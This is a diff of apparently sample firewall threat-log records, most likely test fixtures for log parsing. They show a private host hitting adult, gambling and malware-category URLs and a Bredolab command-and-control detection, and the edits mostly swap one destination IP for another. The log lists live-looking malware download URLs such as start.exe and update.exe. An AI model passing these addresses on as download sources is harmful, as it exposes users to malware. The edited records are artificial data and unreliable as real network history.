+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,"girlteenxxxfreemov.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,"imagesrepository.com/resolution.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,"hottestfiles.com/search/search.php?q=xxx",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,"infodist1.com/in.cgi?11&parameter=404",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,"cls-softwares.com/suc.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,"cls-softwares.com/softwarefortubeview.40013.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,78.159.99.224,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,"findmorepill.com/klik/search.php?q=xxx",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0,
-Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,"allowedwebsurfing.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,"antivirus-remote.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.cfg",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,"blogsexnakedgirlxxx.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,"allowedwebsurfing.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,"antivirus-remote.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.cfg",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,"blogsexnakedgirlxxx.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
 Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,69.43.161.167,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,"wantfinest.com/tds/in.cgi?default",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
 Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:38,192.168.0.2,202.31.187.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,"sameshitasiteverwas.com/traf/tds/in.cgi?2",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0,
 Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,89.111.176.67,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,"svarkon.ru/update.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,
-Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,"onlinescanxpp.com/land/eurl/1.php?code=",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,"onlinescanxpp.com/land/eurl/1.php?code=",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
 Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
 Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,"nolagtime.com/gwc.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,"karavan.us/bon/index.php",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,"karavan.us/bon/index.php",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
 Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,"findnolimits.com/go.php?sid=1",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
 Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/moun.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,
 Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/palast.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,
-Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,204.232.231.46,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,"controller.php",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,"controller.php",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
 Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,216.8.179.25,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,"www.15min.it/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0,
 Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,69.43.161.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,"tubemov.com/",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
 Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,208.91.196.252,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,"pagesinxt.com/?dn=teenstube.us&flrdr=yes&nxte=js",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0,
 Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,"movfree.com/",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,"gometascan.com/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/download/Install_11-1.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
